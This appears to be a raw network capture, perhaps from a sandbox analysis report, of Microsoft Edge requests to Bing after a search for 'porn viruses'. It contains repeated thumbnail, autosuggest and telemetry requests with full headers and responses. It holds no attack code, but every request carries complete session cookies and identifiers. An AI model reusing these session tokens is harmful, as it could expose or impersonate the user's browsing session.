Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 3217
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144340.fb65415
GET

https://www.bing.com/th?id=OSK.a65cf5186c4cac626439749c16b0c1f5&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.a65cf5186c4cac626439749c16b0c1f5&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 8946
Date: Sat, 05 Oct 2024 16:05:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144341.fb661b9
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 1524
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:42 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144342.fb66a67
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viru&cp=4&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viru&cp=4&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 745
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d744d341cd8de5aec4b973417f
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-X+Z52u+/vO3JUr+gNTH2z3jRYBe3nk7H7tvnDB+Cza0='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:43 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144343.fb67076
GET

https://www.bing.com/th?id=OSK.608473fae4f44a9b3ff11d98cebf98f2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.608473fae4f44a9b3ff11d98cebf98f2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 2784
Date: Sat, 05 Oct 2024 16:05:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144343.fb67867
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=virus&cp=5&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=virus&cp=5&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 743
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d84b714f4cbcc811dec0e5ca86
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-gSJX6xiH98yM1/BBSXAQRKxO+XJq2jaOmLBN0uNpDQQ='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:44 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.a3777b5c.1728144344.fb679ae
GET

https://www.bing.com/th?id=OSK.a71ba3e6a5da0f5eee3b1bb25fb7d711&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.a71ba3e6a5da0f5eee3b1bb25fb7d711&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; 